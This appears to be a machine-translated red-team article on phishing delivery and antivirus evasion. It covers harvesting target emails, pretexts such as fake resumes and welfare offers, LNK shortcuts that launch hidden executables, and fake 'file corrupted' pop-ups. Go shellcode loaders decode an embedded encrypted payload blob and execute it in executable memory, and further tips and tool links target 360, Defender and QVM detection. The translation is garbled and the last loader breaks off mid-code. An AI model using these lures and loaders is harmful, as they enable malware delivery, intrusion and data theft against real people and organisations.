Title: Fishing techniques and Trojan-free skills

Brief description

Fishing is a common method in offensive and defensive confrontation. Attackers usually disguise themselves as trustworthy entities, such as legal institutions, companies or individuals, to lure victims to reveal sensitive information or perform malicious operations. They can quickly tear the target's wounds and quickly enter the intranet to brush points. When submitting Trojans, they need to consider evading anti-virus software detection. This article will focus on some common phishing methods and Trojans to avoid killing confrontations.

Information Collection

Batch mailbox collection

https://app.snov.io/

http://www.skymem.info/

Search Engine

Generally speaking, corporate emails have email gateways, and email delivery is easily blocked by refunds, so we need to choose private emails or emails that are not blocked by email servers:

As reported by xx, xx recruitment faces the public's email address, the relevant syntax:

site:'xxx.com' Report

site:'xxx.com' Recruitment

xx company report @126.com

xx company recruitment @qq.com

Fishing Techniques

Social workers fishing

The first is the target selection. Target groups: hr, manager, finance and other people with weak safety awareness are preferred. Prepare multiple sets of scenarios in advance to deal with them.

Select the target company branch for fishing with a high success rate. Think about the words and response measures in advance to avoid being discovered. It is best not to be at the headquarters and avoid IT Information Security Department.

The master of the Sheniu can try to fish by phone, gain trust, and then add WeChat to send Trojan horses (requires extraordinary psychological qualities and adaptability, and I have learned a lot from Pan Gaogong before)

Mail Phishing

Mass emails (not recommended, they are easily discovered by administrators or intercepted by email gateways)

Collect key personal email address to deliver directional delivery (recommended, highly concealed)

Welfare subsidy issuance

Follow the current affairs topic, use various welfare activities to attract target users to click, and convert the phishing link to QR code to send

Resume delivery

Recruitment and delivery resume, hr will not carefully check the suffix when facing a large number of resumes

Can't write fishing copy? It doesn't matter, don't use it by hand if you can generate it automatically. Here is a chicken leg for our chatgpt brother

Report letter

xxx real-name reporting and complaints, this kind of email is generally handled and feedback quickly

Phinging File Disguise

General tips

Trojans need to be compressed, add passwords and hide content, or double-compress the Trojan files to bypass the detection of the email gateway to a certain extent

Select unusual suffixes but can still be executed as exe, such as scr, com, etc.

The file name is long named. If the other file displays incorrectly, the suffix will not be visible during preview.

lnk fishing

If you know that the target unit is not using 360 Tianqing, you can use the lnk file for phishing (360 will intercept)

Fill in the shortcut target position:

%windir%\system32\cmd.exe /c start .\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.doc amp;amp; C:\Windows\explorer.exe '.\.__MACOS__\.__MACOS__\.__MACOS1__\fsx.exe'

Icon Change Path Selection:

C:\\Program Files (x86)\\Microsoft\\Edge\\Application

%SystemRoot%\\System32\\imageres.dll

%SystemRoot%\\System32\\shell32.dll

Box Error Tips

Run msgbox to prompt "File is corrupted" and other confusing content

vbs implementation

On Error Resume Next

WScript.Sleep 2000

msgbox 'The current file is corrupt, please change the tool to open it',64,'tip'

Go code implementation

package main

import (

'github.com/gen2brain/dlgs'

)

func box() {

_, err :=dlgs.Info('Tip', 'The current file is corrupted, please change the tool to open')

if err !=nil {

panic(err)

}

}

Realize the effect

File Bundler

Bind normal files and malicious Trojans. After running, the exe itself will be deleted, and then the normal files will be released and opened in the current directory, and the Trojans will be released to run under the C:\Users\Public\Videos directory

Version 1.1 bypass regular soft-kill (360, def, turtle, etc.)

Version 1.2 Added files automatically hide after they are released

Effect realization

Common soft-killing types

Soft-killing type Soft-killing features Turquoise

There are many restrictions on compilation parameters, and the hash and string features are recognized. The static can be dynamically executed is basically not detected and killed. Some go libraries are called to report poison.

360

Single 360 check is not high. After installing antivirus, your son becomes a father. The killing power is greatly improved. The antivirus will automatically upload samples. It is easy to detect and kill after the cloud is released for a while. It is recommended to use separate loading methods and use anti-sandbox code to extend the time of the horse.

360 core crystal

After opening, there is no big impact on the overall killing performance. Avoid loading shellcode using process injection. Execute the command to use the bof plugin as a replacement.

Defender

Added cobaltstrike rules, and it is recommended to use Stageless, which is better than Stage. The sleep_mask parameter is enabled in version 4.5 to enhance the killing ability, and the detection rate of large files is not high.

Basic loading method

The following is just a basic example, which only implements the function of encryption, decryption and loading.

First use python script to encrypt the payload.c file

import base64

originalShellcode=b'\xfc\xe8\x89\x00'

encryptedShellcode=bytes([byte ^0xFF for byte in originalShellcode])

encodedShellcode=base64.b64encode(encryptedShellcode).decode('utf-8')

print(encodedShellcode)

Fill in encryptedShellcode for the output content to compile

package main

import (

'encoding/base64'

'syscall'

'unsafe'

'github.com/lxn/win'

'golang.org/x/sys/windows'

)

func main() {

//Decrypt shellcode content via base64 and XOR

win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)

encryptedShellcode :='iz/0k4efv3d3dzYmNiclJiE/RqUSP/wlFz/8JW8//CVXP/wFJz94wD09Oka+P0a320sWC3VbVza2vno2draVmiU2Jj/8JVf8NUs/dqcR9g9vfHUCBfz3/3d3dz/ytwMQP3anJ/w/bzP8N1c+dqeUIT+Ivjb8Q/8/dqE6Rr4/RrfbNra+ejZ2tk+XAoY7dDtTfzJOpgKvLzP8N1M+dqcRNvx7PzP8N2s+dqc2/HP/P3anNi82LykuLTYvNi42LT/0m1c2JYiXLzYuLT/8ZZ44iIiIKh13PskAHhkeGRIDdzYhPv6RO/6GNs07AFFwiKI/R r4/RqU6Rrc6Rr42JzYnNs1NIQ7QiKKe5Hd3dy0//rY2z8x2d3c6Rr42JjYmHXQ2JjbNIP7osYiinA4sP/62P0alPv6vOka+JR93RbfzJSU2zZwiWUyIoj/+sT/0tCcdfSg//obNaHd3dx13H/dEd3c+/pc2znN3d3 c2zQIx6fGIoj/+hj/+rT6wt4iIiIg6Rr4lJTbNWnFvDIii8rd48up2d3c/iLh48/t2d3ecxJ6Tdnd3n/WIiIhYBAMWAx4UWB0EWB0GAhIFDlpEWURZRVkEGx4aWRoeGVkdBHdhI6t+16t+1fOvaU170U01iyzbpfay y1/2ar3+Ctaxwg13pLfzUvyPdjEAdyIEEgVaNhASGQNNVzoYDR4bGxZYQllHV18gHhkTGAAETFciTFcgHhkTGAAEVzkjV0JZRkxXEhlaIiRMVwUBTUZZQFlCXlcwEhQcGFhFR0dDRkZHQFcxHgUSERgPWEZZR1dfF g9een138a3Jhf8SuTLptsakGlHpCzEfaWu1GBbwmbCC5spmVmyh80fqMODP2ALXgmypFSNWG7SVeI0OybyhAGGyF4I4kOtTOz1MqEL3Bv8empA2KC6kL9eYO3xP4ukic3tfP++yRqP8gYDC1Aq3kBknsTnkPu3RSJ oVXLtaD3jO3ibMl+cBpDBioUbhePdlxTvlhD+OZ/NDXSwjf1y7hgK70678/6sPEZl2VdgAUuFa17KFDBoUq6Cq9OLDOu5GFZp42AYcsmoQmwd8Xnc2yYfC1SGIoj9Gvs13dzd3Ns93Z3d3Ns43d3d3Ns0v0ySSiKI /5CQkP/6QP/6GP/6tNs93V3d3Pv6ONs1l4f6ViKI/9LNX8rcDwRH8cD92tPK3AqAvLy8/cnd3d3cntJ8IioiIBBIFAR4UEloSAxMVQEMZEVpGREdAQEdHT0ZPWQQfWRYHHhAAWQMSGRQSGQMUBFkUGBp3coKWdw=='

decodedShellcode, _ :=base64.StdEncoding.DecodeString(encryptedShellcode)

for i :=0; i lt; len(decodedShellcode); i++ {

decodedShellcode[i] ^=0x77

}

//Get the VirtualAlloc function in kernel32.dll

kernel32, _ :=syscall.LoadDLL('kernel32.dll')

VirtualAlloc, _ :=kernel32.FindProc('VirtualAlloc')

//Allocate memory and write shellcode content

allocSize :=uintptr(len(decodedShellcode))

mem, _, _ :=VirtualAlloc.Call(uintptr(0), allocSize, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE)

if mem==0 {

panic('VirtualAlloc failed')

}

buffer :=(*[0x1_000_000]byte)(unsafe.Pointer(mem))[:allocSize:allocSize]

copy(buffer, decodedShellcode)

//Execute shellcode

syscall.Syscall(mem, 0, 0, 0, 0)

}

Universal soft-killing skills

Remote loading or file separation loading is preferred, but there are also some disadvantages. The former may be traced or blocked by the security device, and the latter requires two files to be more suitable for rights protection.

Garbage code filling, perform harmless operations before loading shellcode, interfering with sandbox and soft-killing judgments, or bypass detection by delayed execution or increasing the volume of the program.

Choose niche language to write and create loader features. In addition to CS, tools can also use vshell and other self-written C2.

One-click generation without killing

I am shameless and come to Amway to recommend a github project. Ahem, if you think it's OK, you can click a star⭐

The masterpiece of the master Wang Chao who is not killed is modified by the demon attack https://github.com/wangfly-me/LoaderFly

Thousand Machines - Red Team Trojan Free Killing Horse Automatically Generate https://github.com/Pizz33/Qianji

Influence of Compilation Parameters

go:

-race race detection compilation

-ldflags '-s -w' Remove compile information

-ldflags '-H windowsgui' Hide window

garble (obfuscation library):

-tiny Delete extra information

-literals Confused text

-seed=random random seed encoded by base64

For example, if you compile a harmless code, use the -literals parameter. 360 will still report poison. If you don't add it, you won't report poison.

package main

func main() {

//Two numbers to multiply

num1 :=5

num2 :=3

result :=0

//Use a for loop to perform multiplication

for i :=0; i lt; num2; i++ {

result +=num1

}

}

-H Windows gui parameters will also have a great impact on the exemption. If you need to hide the black box, you can use the following code to replace it (but there are still black boxes under win11)

package main

import 'github.com/lxn/win'

func main(){

win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)

}

func box()int{

FreeConsole :=syscall.NewLazyDLL('kernel32.dll').NewProc('FreeConsole')

FreeConsole.Call()

return 0

}

func main() {

box()

Static feature processing

Obfusal

go low version https://github.com/boy-hack/go-strip

go higher version https://github.com/burrowers/garble

mangle Replace String

https://github.com/optiv/Mangle

Mangle.exe -I xxx.exe -M -O out.exe

Comparison before and after mangle processing, it can be found that the feature string of Go compiled is replaced with random characters

base64 encoding variable

cmd :=exec.Command('rundll32.exe', 'xxx')

Key strings are encoded for Base64 and replace variable values at the corresponding position

encodedCommand :='cnVuZGxsMzIuZXhl'

encodedArguments :='MTExTdGFydA=='

//Decode Base64 encoded commands and parameters

decodedCommand, _ :=base64.StdEncoding.DecodeString(encodedCommand)

decodedArguments, _ :=base64.StdEncoding.DecodeString(encodedArguments)

cmd :=exec.Command(string(decodedCommand), string(decodedArguments))

QVM Bypass

Add resources

1. Add information such as picture tag name copyright, you can use the following items to add one click

https://github.com/Pizz33/360QVM_bypass

https://github.com/S9MF/my_script_tools/tree/main/360QVM_bypass-public

https://github.com/langsasec/Sign-Sacker

Behavioral Characteristics

Run the shellcode directly and will usually directly report qvm

package main

import (

'syscall'

'unsafe'

)

var (

ntdll=syscall.MustLoadDLL('ntdll.dll')

VirtualAlloc=kernel32.MustFindProc('VirtualAlloc')

RtlCopyMemory=ntdll.MustFindProc('RtlCopyMemory')

)

const (

MEM_COMMIT=0x1000

MEM_RESERVE=0x2000

PAGE_EXECUTE_READWRITE=0x40

)

func main() {

addr, _, err :=VirtualAlloc.Call(0, uintptr(len(decryt)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)

if err !=nil amp;amp; err.Error() !='The operation completed successfully.' {

syscall.Exit(0)

}

_, _, err=RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(amp;decryt[0])), uintptr(len(decryt)))

if err !=nil amp;amp; err.Error() !='The operation completed successfully